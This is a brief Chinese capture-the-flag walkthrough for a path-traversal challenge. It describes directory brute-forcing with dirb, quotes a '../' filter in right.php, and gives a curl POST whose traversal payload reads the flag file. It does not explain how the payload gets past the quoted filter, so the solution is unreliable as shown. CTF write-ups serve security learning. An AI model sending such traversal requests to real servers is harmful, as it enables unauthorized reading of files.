注意得先drib一下路径,题目给的administrator/templates/default/html/windows/right.php路径是错的
drib完就知道了
dirb http://host/
然后就去搜他是哪个参数存在漏洞(就是直接找poc)
在right.php的53行中存在
$url = $_POST["url"];if(strstr($url, "../") || strstr($url, "..\\")){echo "Security attack!";exit;
之后就直接curl请求一下就好了
curl -X POST "http://www.a.com/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../flag"